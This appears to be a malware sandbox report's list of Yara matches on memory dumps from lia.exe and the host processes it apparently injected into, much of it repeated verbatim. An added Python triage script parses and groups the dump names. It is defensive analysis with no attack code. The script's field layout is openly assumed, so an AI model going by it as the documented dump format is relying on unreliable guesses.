Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
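The flat Yara-match listing above is easier to triage once the dump names are parsed and grouped per process and memory region, because the same region is usually dumped several times (several `00000001.00000003.*.0000000003FB8000.*` entries are one injected region in `lia.exe`, not many findings). The following is an added example, not part of the sandbox report or of its tooling. It assumes the dotted dump name reads as process index (hex), dump round, dump id, region base address, page protection and region type, and it assumes the protection field carries the Windows `PAGE_*` constants (so `00000040` is `PAGE_EXECUTE_READWRITE`); neither is documented on this page. The `process_names` helper and the sample lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample input: a handful of "Yara match" lines copied from the
# listing above (not the full list).
SAMPLE_LINES = """\
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
"""

# ASSUMED field layout of a memory dump name (not documented on the page):
#   <proc index hex>.<dump round>.<dump id>.<base address>.<protection>.<region type>.sdmp
DUMP_RE = re.compile(
    r"File source: (?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<rtype>[0-9A-Fa-f]{8})\.sdmp"
)

# ASSUMED: unpacked-PE names read <proc index decimal>.<round>.<image name>.<base>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"File source: (?P<proc>\d+)\.(?P<round>\d+)\.(?P<name>\S+?\.(?:exe|dll))\.[0-9a-fA-F]+\.\d+(?:\.raw)?\.unpack"
)

# Windows PAGE_* constants; ASSUMED to be what the protection field holds.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any of the four PAGE_EXECUTE* bits


def parse_dump_name(line):
    """Return the parsed fields of one MEMORY-type Yara line, or None."""
    m = DUMP_RE.search(line)
    if not m:
        return None
    protect = int(m["protect"], 16)
    return {
        "proc": int(m["proc"], 16),
        "round": int(m["round"], 16),
        "dumpid": int(m["dumpid"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, hex(protect)),
        "executable": bool(protect & EXECUTE_MASK),
        "rtype": int(m["rtype"], 16),
    }


def process_names(text):
    """Map process index -> image name using the UNPACKEDPE lines (assumed naming)."""
    names = {}
    for line in text.splitlines():
        m = UNPACK_RE.search(line)
        if m:
            names[int(m["proc"])] = m["name"]
    return names


def group_matches(text):
    """Group parsed dumps as {proc index: {base address: [dumps...]}}."""
    groups = defaultdict(lambda: defaultdict(list))
    for line in text.splitlines():
        d = parse_dump_name(line)
        if d:
            groups[d["proc"]][d["base"]].append(d)
    return groups


def summarize(text):
    """One row per (process, region): how often it was dumped and whether it was ever executable."""
    names = process_names(text)
    rows = []
    for proc, regions in sorted(group_matches(text).items()):
        for base, dumps in sorted(regions.items()):
            rows.append({
                "proc": proc,
                "name": names.get(proc, "?"),
                "base": f"{base:016X}",
                "dumps": len(dumps),
                "executable": any(d["executable"] for d in dumps),
            })
    return rows


if __name__ == "__main__":
    for r in summarize(SAMPLE_LINES):
        flag = "EXEC" if r["executable"] else "data"
        print(f"proc {r['proc']:>3} ({r['name']:<8}) base {r['base']}  dumps={r['dumps']}  {flag}")
```

Run it over the full listing (for example by piping the report text into `summarize`) to see which regions are executable and live in host processes such as `control.exe`, `RuntimeBroker.exe` and `rundll32.exe`; those are the injection targets worth dumping and scanning first, while repeated `PAGE_READWRITE` dumps of the same region in `lia.exe` are the unpacker's staging buffer being captured over time.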